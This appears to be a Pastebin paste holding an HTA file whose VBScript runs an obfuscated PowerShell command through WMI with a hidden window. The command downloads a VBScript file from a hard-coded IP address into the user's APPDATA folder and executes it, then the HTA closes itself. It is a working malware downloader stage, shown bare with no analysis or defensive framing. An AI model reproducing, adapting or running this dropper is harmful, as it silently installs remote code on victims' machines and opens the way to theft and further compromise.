MestreQueda

Untitled

Jul 12th, 2019
326
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.79 KB | None | 0 0
  1. <html>
  2. <head>
  3. <HTA:APPLICATION icon="#" WINDOWSTATE="minimize" SYSMENU="no" CAPTION="no" />
  4. <SCRIPT Language="VBScript">
  5.  
  6. strCommand = "Powershell $r='KEX'.replace('K','I'); sal D $r;'(&(GCM'+' *W-O*)'+ 'Net.'+'Web'+'Cli'+'ent)'+'.Dow'+'nl'+'oad'+'Fil'+'e(''http://142.11.204.173/cbmiconstrutora.com.br/Protected%20Client1.txt'',$env:APPDATA+''\\''+''file.vbs'')'|D; start-process($env:APPDATA+'\\'+'file.vbs')"
  7. Set objWMIService = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\cimv2")
  8.  
  9. Set objStartup = objWMIService.Get("Win32_ProcessStartup")
  10. Set objConfig = objStartup.SpawnInstance_
  11. objConfig.ShowWindow = 0
  12.  
  13. Set objProcess = objWMIService.Get("Win32_Process")
  14. intReturn = objProcess.Create(strCommand, Null, objConfig, intProcessID)
  15.  
  16.  
  17. self.close
  18. </SCRIPT>
  19. </body>
  20. </html>
Advertisement
Add Comment
Please, Sign In to add comment